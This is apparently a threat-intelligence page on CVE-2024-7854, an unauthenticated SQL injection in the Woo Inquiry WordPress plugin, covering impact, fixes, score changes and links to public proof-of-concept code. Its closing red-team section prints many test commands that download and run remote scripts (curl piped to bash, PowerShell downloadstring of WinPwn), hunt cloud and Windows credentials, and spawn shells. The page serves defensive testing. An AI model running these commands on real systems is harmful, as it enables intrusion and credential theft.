CVE-2024-7854
Overview
This vulnerability is a SQL Injection affecting the Woo Inquiry plugin for WordPress, specifically versions up to and including 0.1. The root cause is insufficient sanitization and escaping of the user-supplied 'dbid' parameter within SQL queries. The affected component is the plugin's database query handling mechanism, where the input is directly concatenated into SQL statements without proper parameterization or prepared statements.
Vulnerability Description
The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary SQL commands on the backend database, enabling extraction, modification, or deletion of sensitive data. No authentication or user interaction is required, and the attack can be performed remotely over the network. This can lead to complete compromise of the database confidentiality, integrity, and availability, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Solution
Users should upgrade the Woo Inquiry plugin to a version later than 0.1 where this vulnerability is addressed. Detailed patch information and remediation guidance are available from Wordfence at https://www.wordfence.com/threat-intel/vulnerabilities/id/312a6601-c914-4661-82ff-6f8bac849442. The plugin's source code repository shows the relevant fixes applied to the functions.php file, specifically sanitizing the 'dbid' parameter and implementing prepared statements to prevent SQL injection.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Woo Inquiry plugin for WordPress is a critical SQL Injection flaw that arises from inadequate input validation and escaping mechanisms. Specifically, the issue lies in the handling of the user-supplied parameter 'dbid'. When this parameter is incorporated into SQL queries without proper sanitization, it allows attackers to manipulate the query structure. This lack of sufficient preparation enables the injection of arbitrary SQL code, which can be executed by the database. As a result, attackers can potentially gain unauthorized access to sensitive data, including user credentials, personal information, and other confidential records stored within the database.
Attack vectors for exploiting this vulnerability are straightforward and can be executed by unauthenticated users, significantly broadening the threat landscape. An attacker could craft a malicious request that includes specially formatted input for the 'dbid' parameter. By appending additional SQL commands, the attacker can retrieve data that should otherwise be protected. For instance, an attacker could extract user tables, enumerate database schemas, or even modify data, depending on the privileges of the database connection. This type of attack is particularly concerning in a web application context, where the ease of access to the input fields can facilitate widespread exploitation.
The real-world impact of such a vulnerability is profound, particularly for businesses that rely on the Woo Inquiry plugin for managing customer inquiries and data. The potential for data breaches not only jeopardizes sensitive customer information but also poses significant reputational risks. Organizations may face legal repercussions due to non-compliance with data protection regulations, such as GDPR or CCPA, if they fail to protect user data adequately. Furthermore, the financial implications of a breach can be severe, encompassing costs related to incident response, public relations efforts, and potential fines. The high CVSS score of 9.8 underscores the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risk associated with this SQL Injection vulnerability, organizations should implement a multi-layered security approach. Regular security audits and vulnerability assessments can help identify weaknesses in the application. Employing web application firewalls (WAFs) can provide an additional layer of defense by filtering and monitoring HTTP requests for malicious patterns. Moreover, developers should adopt secure coding practices, such as using prepared statements and parameterized queries, to prevent SQL Injection vulnerabilities from being introduced in the first place. Additionally, keeping the Woo Inquiry plugin and all other components of the WordPress installation up to date is crucial in minimizing exposure to known vulnerabilities.
In conclusion, the SQL Injection vulnerability in the Woo Inquiry plugin poses a significant threat to the integrity and confidentiality of data in WordPress environments. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention from organizations using this plugin. By implementing robust detection and mitigation strategies, businesses can safeguard their applications against such vulnerabilities and protect their sensitive data from unauthorized access.
The CVSS score for CVE-2024-7854 has been adjusted upward to a perfect 10.0, reflecting a reassessment of the vulnerability’s exploitability and impact. This change underscores the critical nature of the SQL injection flaw in the Woo Inquiry plugin, emphasizing that exploitation requires no authentication and can lead to full database compromise. CSURFACE threat intelligence confirms the availability of new proof-of-concept exploits on public repositories, which lowers the barrier for adversaries to weaponize this vulnerability. Although our telemetry indicates the exploitation trend remains stable without a marked surge, the high EPSS score situates this vulnerability among the most likely to be exploited in the near term. For defenders, this escalation in severity signals an urgent need to prioritize detection and response efforts, as attackers can leverage this flaw to extract sensitive data or pivot within compromised environments. The updated risk assessment elevates the threat level to the highest tier, reinforcing that unpatched instances of the Woo Inquiry plugin represent a critical security liability.
Update 2 — May 21, 2026
Recent developments in the CVE-2024-7854 vulnerability reveal an expanded exploit landscape with the emergence of new proof-of-concept tools publicly available on GitHub. While the CVSS score was adjusted slightly downward from 10.0 to 9.8, this refinement reflects a more precise assessment of exploitability rather than a reduction in risk. CSURFACE threat intelligence confirms that exploitation trends remain stable, with no marked surge in active attacks; however, the vulnerability continues to rank in the highest percentile for likelihood of exploitation according to EPSS metrics. This sustained high exploitability, combined with the broader availability of attack tools, underscores an elevated threat posture for organizations running affected versions of the Woo Inquiry plugin. Defenders should recognize that the risk environment remains critical, as adversaries can leverage these new resources to conduct unauthenticated SQL injection attacks capable of extracting sensitive database information. The updated risk assessment maintains this vulnerability at a critical threat level, emphasizing the persistent and accessible nature of exploitation avenues.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sjhoo | Woo Inquiry | 0.1 |
cpe:2.3:a:sjhoo:woo_inquiry:0.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-7854
Woo Inquiry <= 0.1 - Unauthenticated SQL Injection
|
RandomRobbieBF | 1 | 0 | 2024-10-04 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-7854 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/312a6601-c914-4661-82ff-6f8bac849442?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woo-inquiry/trunk/includes/functions.php?rev=2088873#L307 |